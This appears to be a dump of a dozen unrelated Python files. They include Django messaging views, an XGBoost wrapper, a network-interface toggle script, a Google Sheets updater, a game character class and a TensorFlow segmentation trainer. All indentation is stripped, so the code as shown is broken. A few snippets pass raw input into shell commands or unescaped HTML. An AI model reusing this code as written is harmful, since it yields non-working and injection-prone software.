elif opt.mode == 'self':
model = resnet.resnet50(opt=opt)
if opt.pretrained == '':
# pass
if opt.mode == 'label':
# pass
pretrained_model = torchvision.models.resnet18(pretrained=True)
# pretrained_model = torchvision.models.resnet50(pretrained=True)
model.conv1.load_state_dict(pretrained_model.conv1.state_dict())
model.bn1.load_state_dict(pretrained_model.bn1.state_dict())
model.relu.load_state_dict(pretrained_model.relu.state_dict())
model.maxpool.load_state_dict(pretrained_model.maxpool.state_dict())
model.layer1.load_state_dict(pretrained_model.layer1.state_dict())
model.layer2.load_state_dict(pretrained_model.layer2.state_dict())
model.layer3.load_state_dict(pretrained_model.layer3.state_dict())
model.layer4.load_state_dict(pretrained_model.layer4.state_dict())
model.avgpool.load_state_dict(pretrained_model.avgpool.state_dict())
else:
pass
else:
checkpoint = torch.load(opt.pretrained)
model.load_state_dict(checkpoint['model'], strict=False)
if torch.cuda.is_available():
if torch.cuda.device_count() > 1:
print(torch.cuda.device_count(), 'Multi GPU running')
model = torch.nn.DataParallel(model)
model = model.to(device)
return model
class GaussianBlur(object):
"""Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709"""
def __init__(self, sigma=[.1, 2.]):
self.sigma = sigma
def __call__(self, x):
sigma = random.uniform(self.sigma[0], self.sigma[1])
x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
return x
|
nilq/baby-python
|
python
|
x = int(input())
if x % 2 == 0:
y = x + 1
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
else:
y = x
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
y = y + 2
print(y)
|
nilq/baby-python
|
python
|
from datetime import datetime
from django.utils import timezone
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.views.decorators.http import condition
from foundation_public.models.organization import PublicOrganization
from tenant_profile.decorators import tenant_profile_required
from tenant_intake.decorators import tenant_intake_required
from tenant_reception.decorators import tenant_reception_required
from tenant_configuration.decorators import tenant_configuration_required
from foundation_tenant.decorators import tenant_required
from foundation_tenant.models.base.message import Message
from foundation_tenant.models.base.me import Me
from smegurus import constants
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def inbox_page(request):
# Fetch all the Messages and only get a single message per sender. Also ensure
# that deleted messages are not returned.
messages = Message.objects.filter(
recipient=request.tenant_me,
participants=request.tenant_me
).distinct('participants')
return render(request, 'tenant_message/message/master_view.html',{
'page': 'inbox',
'messages': messages,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def compose_page(request):
entrepreneurs = Me.objects.filter(owner__groups__id=constants.ENTREPRENEUR_GROUP_ID)
mentors = Me.objects.filter(owner__groups__id=constants.MENTOR_GROUP_ID)
advisors = Me.objects.filter(owner__groups__id=constants.ADVISOR_GROUP_ID)
managers = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_MANAGER_GROUP_ID)
admins = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_ADMIN_GROUP_ID)
return render(request, 'tenant_message/composer/generic_view.html',{
'page': 'composer',
'entrepreneurs': entrepreneurs,
'mentors': mentors,
'advisors': advisors,
'managers': managers,
'admins': admins,
'recipient_id': 0,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def specific_compose_page(request, id):
entrepreneurs = Me.objects.filter(owner__groups__id=constants.ENTREPRENEUR_GROUP_ID)
mentors = Me.objects.filter(owner__groups__id=constants.MENTOR_GROUP_ID)
advisors = Me.objects.filter(owner__groups__id=constants.ADVISOR_GROUP_ID)
managers = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_MANAGER_GROUP_ID)
admins = Me.objects.filter(owner__groups__id=constants.ORGANIZATION_ADMIN_GROUP_ID)
recipient = get_object_or_404(Me,pk=id)
return render(request, 'tenant_message/composer/specific_view.html',{
'page': 'composer',
'entrepreneurs': entrepreneurs,
'mentors': mentors,
'advisors': advisors,
'managers': managers,
'admins': admins,
'recipient': recipient,
})
@login_required()
@tenant_required
def latest_conversation_details(request, sender_id):
return Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).latest("last_modified").last_modified
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def conversation_page(request, sender_id):
messages = Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).order_by("created")
# Recipients have the ability to update the 'date_read'.
for message in messages.all():
if message.recipient == request.tenant_me:
# Give the message the read-time.
message.date_read = timezone.now()
message.save()
return render(request, 'tenant_message/message/details_view.html',{
'page': 'inbox',
'messages': messages,
'sender_id': sender_id,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_conversation_page(request, sender_id):
messages = Message.objects.filter(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
participants=request.tenant_me
) | Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
participants=request.tenant_me
)
).order_by("created")
# Iterate through all the messages and removes the person from the conversation. (A.k.a.: archived)
for message in messages.all():
message.participants.remove(request.tenant_me)
message.save()
# Redirect his page.
return HttpResponseRedirect(reverse('tenant_message_inbox'))
@login_required()
@tenant_required
def latest_archived_message_master(request):
try:
return Message.objects.filter(
Q(
recipient=request.tenant_me
) &~ # and not
Q(
participants=request.tenant_me
)
).latest("last_modified").last_modified
except Message.DoesNotExist:
return datetime.now()
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
# @condition(last_modified_func=latest_archived_message_master)
def archive_list_page(request):
# Fetch all the Messages and only get a single message per sender. Also ensure
# that deleted messages are not returned.
messages = Message.objects.filter(
Q(
recipient=request.tenant_me
) &~ # and not
Q(
participants=request.tenant_me
)
).distinct('participants')
return render(request, 'tenant_message/archive/master_view.html',{
'page': 'archive',
'messages': messages,
})
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_details_page(request, sender_id):
messages = Message.objects.filter(
Q(
Q(
recipient=request.tenant_me,
sender_id=int(sender_id),
) &~ # and not
Q(
participants=request.tenant_me
)
) |
Q(
Q(
recipient_id=int(sender_id),
sender_id=request.tenant_me,
) &~ # and not
Q(
participants=request.tenant_me
)
)
).order_by("created")
return render(request, 'tenant_message/archive/details_view.html',{
'page': 'archive',
'messages': messages,
'sender_id': sender_id,
})
|
nilq/baby-python
|
python
|
# https://leetcode.com/problems/palindrome-number/
class Solution:
def isPalindrome(self, x: int) -> bool:
if x < 0:
return False
p, res = x, 0
while p:
res = res * 10 + p % 10
p = int(p/10)
return res == x
|
nilq/baby-python
|
python
|
import numpy as np
import multiprocessing
import xgboost as xgb # requires xgboost package, installed e.g. via 'pip install xgboost'
class XGBoost:
def __init__(self, train_loader, val_loader, x_shape, dim_out, args):
self.args = args
self.dim_out = dim_out
if args.regression:
objective = 'reg:linear'
eval_metric = 'rmse'
if args.criterion in {'mae', 'l1'}:
eval_metric = 'mae'
elif args.criterion not in {None, 'auto', 'rmse'}:
raise Exception('Unknown eval_metric={}. For regression, use auto (rmse) | mae (l1).'.format(
args.criterion))
else:
if self.dim_out > 2:
objective = 'multi:softmax' # out 1 vector of classes
if args.criterion in {None, 'auto', 'error', 'merror'}:
eval_metric = 'merror'
elif args.criterion in {'logloss', 'nll'}:
eval_metric = 'mlogloss'
else:
raise Exception('eval_metric={} is not supported for multi-classes classification. '
'Use auto (merror) | logloss (nll)'.format(args.criterion))
else:
objective = 'binary:hinge' # 'binary:logistic' # logistic -> predict outputs probability, not class
if args.criterion in {None, 'auto', 'error', 'merror'}:
eval_metric = 'error'
elif args.criterion in {'logloss', 'nll'}: # auc somehow only works with 2 classes
eval_metric = 'logloss'
elif args.criterion == 'auc': # auc somehow only works with 2 classes
eval_metric = 'auc'
else:
raise Exception('eval_metric={} is not supported for 2-class classification. '
'Use auto (error) | logloss (nll) | auc'.format(args.criterion))
self.x_train, self.y_train = train_loader.numpy_data()
self.x_val, self.y_val = val_loader.numpy_data()
if len(self.x_train.shape) > 2:
self.x_train = self.x_train.reshape(self.x_train.shape[0], -1)
self.x_val = self.x_val.reshape(self.x_val.shape[0], -1)
self.dtrain = xgb.DMatrix(self.x_train, label=self.y_train)
self.dval = xgb.DMatrix(self.x_val, label=self.y_val)
if args.early_stopping is not None and args.early_stopping <= 0:
self.early_stopping = None
else:
self.early_stopping = args.early_stopping
num_cpu = multiprocessing.cpu_count()
if not hasattr(args, 'n_workers') or args.n_workers is None:
args.n_workers = 1
elif args.n_workers > num_cpu:
args.n_workers = num_cpu
if args.verbose >= 3:
print('args.n_workers is inefficiently large, changed it to num_cpu=' + str(num_cpu))
elif args.n_workers <= -300:
args.n_workers = max(1, num_cpu // 3)
elif args.n_workers <= -200:
args.n_workers = max(1, num_cpu // 2)
elif args.n_workers < 0:
args.n_workers = max(1, num_cpu + args.n_workers)
self.params = {'objective': objective,
'eval_metric': eval_metric,
'seed': args.seed,
'max_depth': args.max_depth,
'eta': args.eta,
'min_child_weight': args.min_child_weight,
'gamma': args.gamma,
'subsample': args.subsample,
'colsample_bytree': args.colsample_bytree,
'lambda': args.reg_lambda,
'alpha': args.reg_alpha,
'scale_pos_weight': args.scale_pos_weight,
'nthread': args.n_workers}
if objective == 'multi:softmax' or objective == 'multi:softprob':
self.params['num_class'] = dim_out
self.result = {'n_estimators': 0}
self.model = None
if args.verbose >= 3:
print('XGBOOST OPTIMIZER LOADED: ')
def eval(self, x, y):
pred = self.predict(x)
rmse = mae = error = float('inf')
if self.args.regression:
rmse = np.sqrt(np.sum((pred - y)**2) / y.shape[0]).item()
mae = (np.sum(np.abs(pred - y)) / y.shape[0]).item()
else:
if self.params['objective'] == 'binary:logistic': # pred is probability, not class
pred[pred >= 0.5] = 1
pred[pred < 0.5] = 0
pred = pred.astype(int)
correct = np.sum(pred == y).item()
error = 1.0 - float(correct) / y.shape[0]
loss = rmse if self.params['eval_metric'] == 'rmse' else mae
return loss, error, rmse, mae
def train(self):
eval_list = [(self.dtrain, 'train'), (self.dval, 'valdt')] # last in the list is used for early stopping
if self.args.verbose >= 5:
verbose_eval = True
elif self.args.verbose <= 3:
verbose_eval = False
else:
verbose_eval = self.args.n_estimators // 10 # output only 10 evaluation info
self.model = xgb.train(self.params, self.dtrain, self.args.n_estimators, eval_list,
verbose_eval=verbose_eval, early_stopping_rounds=self.early_stopping)
tr_loss, tr_error, tr_rmse, tr_mae = self.eval(self.x_train, self.y_train)
vl_loss, vl_error, vl_rmse, vl_mae = self.eval(self.x_val, self.y_val)
self.result = {'train_loss': tr_loss, 'train_error': tr_error, 'train_rmse': tr_rmse, 'train_mae': tr_mae,
'val_loss': vl_loss, 'val_error': vl_error, 'val_rmse': vl_rmse, 'val_mae': vl_mae,
'n_estimators': self.model.best_ntree_limit}
if self.args.verbose >= 3:
if self.args.regression and not self.args.dataset.endswith("_r"):
print('TRAIN RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(tr_loss, tr_rmse, tr_mae))
print('VALDT RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(vl_loss, vl_rmse, vl_mae))
else:
print('TRAIN RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
tr_loss, 100. * tr_error, 100. * (1 - tr_error)))
print('VALDT RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
vl_loss, 100. * vl_error, 100. * (1 - vl_error)))
def test(self, dataloader):
x_test, y_test = dataloader.numpy_data()
if len(x_test.shape) > 2:
x_test = x_test.reshape(x_test.shape[0], -1)
return self.eval(x_test, y_test)
def predict(self, x):
assert self.model, 'model is not yet trained. Call train() first!'
x = xgb.DMatrix(x)
pred = self.model.predict(x, ntree_limit=self.model.best_ntree_limit)
return pred
@property
def best_n_modules(self):
return self.result['n_estimators']
|
nilq/baby-python
|
python
|
import os
import time
# 请求用户输入要循环开关闭的网卡名称
eth_name = input('请输入要循环启用关闭的网卡名称:')
# 记录循环次数
i = 1
while True:
# 关闭指定网卡
os.popen('ifconfig ' + eth_name + ' down')
print(eth_name + '网卡关闭了')
# 休眠5S
time.sleep(5)
# 开启指定网卡
os.popen('ifconfig ' + eth_name + ' up')
print(eth_name + '网卡开启了')
# 休眠5S
time.sleep(5)
print('第' + str(i) + '次循环结束')
i = i + 1
|
nilq/baby-python
|
python
|
import wx
class Example(wx.Frame):
def __init__(self, parent, title):
super(Example, self).__init__(parent, title=title,
size=(400, 200))
self.Move((800, 250))
#self.Centre()
def main():
app = wx.App()
ex = Example(None, title='M2I & MQL - Moving Wind')
ex.Show()
app.MainLoop()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
"""
This file defines common tags to use in templates
"""
from django import template
from django.contrib import messages
from django.template.defaultfilters import safe
register = template.Library()
@register.filter(name="make_spaces")
def make_spaces(in_string: str) -> str:
"""
This filter takes a string and replaces all dashes and underscores with spaces
:param in_string: The string to change
:type in_string: str
:returns: A string with no dashes or underscores
:rtype: str
"""
return in_string.replace("_", " ").replace("-", " ")
link_types = {
'delete': 'link-danger',
'abandon': 'link-danger',
'cancel': 'link-danger',
}
@register.filter(name="link_class")
def get_link_class(action_name: str) -> str:
"""
This filter gets what link class to use based off the action that it performs
:param action_name: The name of the action
:type action_name: str
:returns: The link class that conveys what the action does
:rtype: str
"""
return link_types.get(action_name, "link-primary")
level_classes = {
messages.SUCCESS: "success",
messages.ERROR: "danger",
messages.DEBUG: "info",
messages.INFO: "info",
messages.WARNING: "warning",
}
@register.filter(name="alert_class")
def get_alert_class(message_level: str) -> str:
"""
This filter gets an alert class for the specified message type
:param message_level: The level of the message
:type message_level: int
:returns: The corresponding alert class to use
:rtype: str
"""
return f'alert-{level_classes.get(message_level, "info")}'
icon_classes = {
messages.SUCCESS: "check-circle",
messages.ERROR: "exclamation-circle",
messages.DEBUG: "info-circle",
messages.INFO: "info-circle",
messages.WARNING: "exclamation-triangle",
}
@register.filter(name="icon_class")
def get_icon_class(message_level: str) -> str:
"""
This filter gets an alert icon for the specified message type
:param message_level: The level of the message
:type message_level: int
:returns: The corresponding alert icon to use
:rtype: str
"""
return f'bi bi-{icon_classes.get(message_level, "info-circle")}'
@register.simple_tag(name="external_link")
def external_link(href: str, display_text: str, classes: str = "") -> str:
"""
This tag will render an <a> element that will open in a new tab and be marked as external
:param href: The href of the link
:type href: str
:param display_text: The test to display in the <a> element
:type display_text: str
:param classes: Classes to add to the <a> element
:type classes: str
:returns: An <a> element in html that when clicked will open in a new tab
:rtype: str
"""
return safe(f'<a href="{href}" class="{classes}" target="_blank" rel="noopener">{display_text}</a>')
|
nilq/baby-python
|
python
|
import json
from google.protobuf import json_format
from services.doubler.doubler_pb2 import Number
def build_request_from_dict(d, request):
json_str = json.dumps(d)
return json_format.Parse(json_str, request)
def build_request_from_file(filename, request):
with open(filename) as f:
json_str = f.read()
return json_format.Parse(json_str, request)
def build_number_from_dict(d):
return build_request_from_dict(d, Number())
def build_number_from_file(filename):
return build_request_from_file(filename, Number())
|
nilq/baby-python
|
python
|
from .convLSTM import StConvLSTM
from .GRU import StGRU
from .additive import StAdditive
from .LSTM import StLSTM
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Example of a telnet application that displays a dialog window.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.telnet.server import TelnetServer
from prompt_toolkit.shortcuts.dialogs import yes_no_dialog
from prompt_toolkit.eventloop import From, get_event_loop
import logging
# Set up logging
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
def interact(connection):
result = yield From(yes_no_dialog(
title='Yes/no dialog demo', text='Press yes or no', async_=True))
connection.send('You said: {}\n'.format(result))
connection.send('Bye.\n')
def main():
server = TelnetServer(interact=interact, port=2323)
server.start()
get_event_loop().run_forever()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
def contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista):
# Quantidade Pedidos estão fechado
quant_terminado = len(lista)
celula= "Página1!"+str("D2")
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
body = {'values': [[quant_terminado]]}
result = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, range=celula,valueInputOption="USER_ENTERED", body=body).execute()
# Quais são os pedidos estão fechados
for id_cliente in range(len(lista)):
texto= lista[id_cliente]
celula= "Página1!"+str("A%i"%(id_cliente+2))
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
body = {'values': [[texto]]}
result = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, range=celula,valueInputOption="USER_ENTERED", body=body).execute()
def main(lista):
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
# The ID and range of a sample spreadsheet.
padrao_planilha= input("deseja usar a mesma planilha. y ou digite qualquer coisa\n").lower()
if padrao_planilha == "y":
SAMPLE_SPREADSHEET_ID = '1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563'
else:
SAMPLE_SPREADSHEET_ID = input("INSERIR A PARTE DO URL DO GOOGLE SHEETS, EX: 1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563 \n")
"""Shows basic usage of the Sheets API.
Prints values from a sample spreadsheet.
"""
lista= lista
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('sheets', 'v4', credentials=creds)
contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista)
|
nilq/baby-python
|
python
|
'''
Created on Jan 6, 2016
@author: T0157129
'''
import logging
import logging.config
from Items.PotionObject import PotionObject
class MyCharacter:
'''
This class represents a basic character.
Attributes:
int HP : represents the Health Points of the character.
If HP==0 the character is dead
dict equipment : represents the equipment of the character.
weapon : the character's active weaponObject
armor : the character's active armorObject
dict bag : represents the bag of the character. Here will be stored every found item.
HP_potion : the number of HP potions that the character owns.
<item_name> : any found itemObject.
Functions:
boolean isAlive()
'''
def __init__(self, HP, name, level):
'''
Constructor
'''
self.HPinit= HP
self.HP = HP
self.name = name
self.level= level
self.gold= 0
self.equipment= {}
self.equipment["weapon"]=None
self.equipment["armor"]=None
self.bag={}
'''
boolean isAlive()
Return true if HP > 0
'''
def isAlive(self):
return self.HP>0
########################################
# EQUIPMENT management
########################################
'''
void equipWeapon(weaponObject)
Equip the character with the weaponObject.
If a weapon is already equipped, the old one is added to the bag.
'''
def equipWeapon(self, weaponObject):
if weaponObject is not None:
actualWeapon= self.equipment["weapon"]
if actualWeapon is not None:
self.addToBag(actualWeapon)
self.equipment["weapon"]= weaponObject
# self.logger.info("Weapon equipped: %s" % weaponObject.name)
'''
void equipArmor(armorObject)
Equip the character with the armorObject.
If an armor is already equipped, the old one is added to the bag.
'''
def equipArmor(self, armorObject):
if armorObject is not None:
actualArmor = self.getArmor()
if actualArmor is not None:
self.addToBag(actualArmor)
self.equipment["armor"]= armorObject
# self.logger.info("Armor equipped: %s" % armorObject.name)
'''
weaponObject getWeapon()
Return the equipped weapon.
Can be None
'''
def getWeapon(self):
weapon = self.equipment["weapon"]
self.equipment["weapon"]= None
return weapon
'''
armorObject getArmor()
Return the equipped armor.
Can be None
'''
def getArmor(self):
armor = self.equipment["armor"]
self.equipment["armor"]= None
return armor
########################################
# BAG management
########################################
'''
void listInventory()
Print the content of the character's bag
'''
def listInventory(self):
print( '-- INVENTORY OF %s CONTAINS:' % self.name)
for itemName in self.bag.keys():
print (" |%s" % self.bag[itemName])
'''
void addToBag(itemObject)
Add itemObject to the bag.
The key for this object is the itemObject.name
'''
def addToBag(self, itemObject):
self.bag[itemObject.name()]= itemObject
print("Item put in bag: %s" % itemObject.name())
'''
itemObject getFromBag(itemName)
Get the object named "itemName" from the bag.
If there is no itemObject named like this in the bag, return None.
'''
def getFromBag(self, itemName):
return self.bag[itemName]
'''
itemObject takeFromBag(itemName)
Get the object named "itemName" from the bag.
The object is no longer in the bag.
If there is no itemObject named like this in the bag, return None.
'''
def takeFromBag(self, itemName):
return self.bag.pop(itemName)
def removeFromBag(self, itemName):
self.bag.pop(itemName)
'''
void useFromBag(itemName)
If an item with this name is found, call its use function.
'''
def useFromBag(self, itemName):
item= self.bag.get(itemName)
if item is not None:
if item.get('usable') is None:
print('Not usable')
return
else:
#If it's not a potion we remove the object from the bag
if not isinstance(item, PotionObject):
item= self.takeFromBag(itemName)
if item is None:
print("No such object in the bag.")
else:
item.use(self)
else:
print("none obj")
########################################
# FIGHT management
########################################
'''
void defend(damagePoints)
The character loose HP depending on his armor and damagePoints.
'''
def defend(self, damagePoints):
armor= self.equipment["armor"]
if armor != None:
m_damagePoints = damagePoints - armor.defensePoints()
if m_damagePoints < 0:
m_damagePoints=0
else:
m_damagePoints = damagePoints
self.HP = self.HP - m_damagePoints
print("%s has lost %d HP..." % (self.name,m_damagePoints))
'''
void attack(characterObject)
The character attacks characterObject.
If the character has no weapon, do nothing.
'''
def attack(self, characterObject):
weapon = self.equipment["weapon"]
if weapon != None:
print("%s attacks." % self.name)
characterObject.defend(weapon.attackPoints())
else:
print("%s can't attack, no weapon..." % self.name)
########################################
# Other functions
########################################
'''
unitsUsed fillHP(units)
Refill HP bar with units points.
Return the number of units recovered.
(Can be: 0 if HP == HPinit
or units
or the difference between HP and HPinit if HP+units > HPinit)
'''
def fillHP(self, units):
unitsUsed= 0
if self.HP < self.HPinit:
#Restore HP
if self.HP + units >= self.HPinit:
unitsUsed= self.HPinit - self.HP
else:
unitsUsed= units
self.HP= self.HP + unitsUsed
print("%s recovered %d HP." % (self.name, unitsUsed))
else:
print("%s HP already full." % self.name)
return unitsUsed
|
nilq/baby-python
|
python
|
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class Solution(object):
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
ans = []
for intv in sorted(intervals, key=lambda x: x.start):
if ans and ans[-1].end >= intv.start:
ans[-1].end = max(ans[-1].end, intv.end)
else:
ans.append(intv)
return ans
|
nilq/baby-python
|
python
|
from __future__ import division
import os,time,cv2
import scipy.io as sio
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from numpy import *
import scipy.linalg
from copy import copy, deepcopy
def lrelu(x):
return tf.maximum(x*0.2,x)
def identity_initializer():
def _initializer(shape, dtype=tf.float32, partition_info=None):
array = np.zeros(shape, dtype=float)
cx, cy = shape[0]//2, shape[1]//2
for i in range(min(shape[2],shape[3])):
array[cx, cy, i, i] = 1
return tf.constant(array, dtype=dtype)
return _initializer
def nm(x):
w0=tf.Variable(1.0,name='w0')
w1=tf.Variable(0.0,name='w1')
return w0*x+w1*slim.batch_norm(x)
MEAN_VALUES = np.array([123.6800, 116.7790, 103.9390]).reshape((1,1,1,3))
def build_net(ntype,nin,nwb=None,name=None):
if ntype=='conv':
return tf.nn.relu(tf.nn.conv2d(nin,nwb[0],strides=[1,1,1,1],padding='SAME',name=name)+nwb[1])
elif ntype=='pool':
return tf.nn.avg_pool(nin,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
def get_weight_bias(vgg_layers,i):
weights=vgg_layers[i][0][0][2][0][0]
weights=tf.constant(weights)
bias=vgg_layers[i][0][0][2][0][1]
bias=tf.constant(np.reshape(bias,(bias.size)))
return weights,bias
def build_vgg19(input,reuse=False):
if reuse:
tf.get_variable_scope().reuse_variables()
net={}
vgg_rawnet=scipy.io.loadmat('Models/imagenet-vgg-verydeep-19.mat')
vgg_layers=vgg_rawnet['layers'][0]
net['input']=input-MEAN_VALUES
net['conv1_1']=build_net('conv',net['input'],get_weight_bias(vgg_layers,0),name='vgg_conv1_1')
net['conv1_2']=build_net('conv',net['conv1_1'],get_weight_bias(vgg_layers,2),name='vgg_conv1_2')
net['pool1']=build_net('pool',net['conv1_2'])
net['conv2_1']=build_net('conv',net['pool1'],get_weight_bias(vgg_layers,5),name='vgg_conv2_1')
net['conv2_2']=build_net('conv',net['conv2_1'],get_weight_bias(vgg_layers,7),name='vgg_conv2_2')
net['pool2']=build_net('pool',net['conv2_2'])
net['conv3_1']=build_net('conv',net['pool2'],get_weight_bias(vgg_layers,10),name='vgg_conv3_1')
net['conv3_2']=build_net('conv',net['conv3_1'],get_weight_bias(vgg_layers,12),name='vgg_conv3_2')
net['conv3_3']=build_net('conv',net['conv3_2'],get_weight_bias(vgg_layers,14),name='vgg_conv3_3')
net['conv3_4']=build_net('conv',net['conv3_3'],get_weight_bias(vgg_layers,16),name='vgg_conv3_4')
net['pool3']=build_net('pool',net['conv3_4'])
net['conv4_1']=build_net('conv',net['pool3'],get_weight_bias(vgg_layers,19),name='vgg_conv4_1')
net['conv4_2']=build_net('conv',net['conv4_1'],get_weight_bias(vgg_layers,21),name='vgg_conv4_2')
net['conv4_3']=build_net('conv',net['conv4_2'],get_weight_bias(vgg_layers,23),name='vgg_conv4_3')
net['conv4_4']=build_net('conv',net['conv4_3'],get_weight_bias(vgg_layers,25),name='vgg_conv4_4')
net['pool4']=build_net('pool',net['conv4_4'])
net['conv5_1']=build_net('conv',net['pool4'],get_weight_bias(vgg_layers,28),name='vgg_conv5_1')
net['conv5_2']=build_net('conv',net['conv5_1'],get_weight_bias(vgg_layers,30),name='vgg_conv5_2')
#net['conv5_3']=build_net('conv',net['conv5_2'],get_weight_bias(vgg_layers,32),name='vgg_conv5_3')
#net['conv5_4']=build_net('conv',net['conv5_3'],get_weight_bias(vgg_layers,34),name='vgg_conv5_4')
#net['pool5']=build_net('pool',net['conv5_4'])
return net
def build(input,sz):
vgg19_features=build_vgg19(input[:,:,:,0:3])
for layer_id in range(1,6):
vgg19_f = vgg19_features['conv%d_2'%layer_id]
input = tf.concat([input, tf.image.resize_bilinear(vgg19_f,sz)], axis=3)
input = input/255.0
net=slim.conv2d(input,64,[1,1],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv0')
net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv1')
net=slim.conv2d(net,64,[3,3],rate=2,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv2')
net=slim.conv2d(net,64,[3,3],rate=4,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv3')
net=slim.conv2d(net,64,[3,3],rate=8,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv4')
net=slim.conv2d(net,64,[3,3],rate=16,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv5')
net=slim.conv2d(net,64,[3,3],rate=32,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv6')
net=slim.conv2d(net,64,[3,3],rate=64,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv7')
net=slim.conv2d(net,64,[3,3],rate=128,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv8')
net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv9')
net=slim.conv2d(net,6,[1,1],rate=1,activation_fn=None,scope='g_conv_last')
return tf.tanh(net)
def prepare_data():
train_im_names = [line.rstrip() for line in open('./train.txt')]
val_im_names = [line.rstrip() for line in open('./val.txt')]
return train_im_names,val_im_names
config=tf.ConfigProto()
config.gpu_options.allow_growth=True
sess=tf.Session(config=config)
im_path = "./img"
seg_path = "./inst"
train_im_names,val_im_names = prepare_data()
input=tf.placeholder(tf.float32,shape=[None,None,None,7])
output=tf.placeholder(tf.float32,shape=[None,None,None,1])
sz=tf.placeholder(tf.int32,shape=[2])
input_vgg=tf.placeholder(tf.float32,shape=[None,None,None,3])
network=build(input,sz)
vgg19_network=build_vgg19(input_vgg)
# L2 Loss
loss_d1=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss_d2=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss_d3=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss_d4=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss_d5=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,4],axis=3)-output))
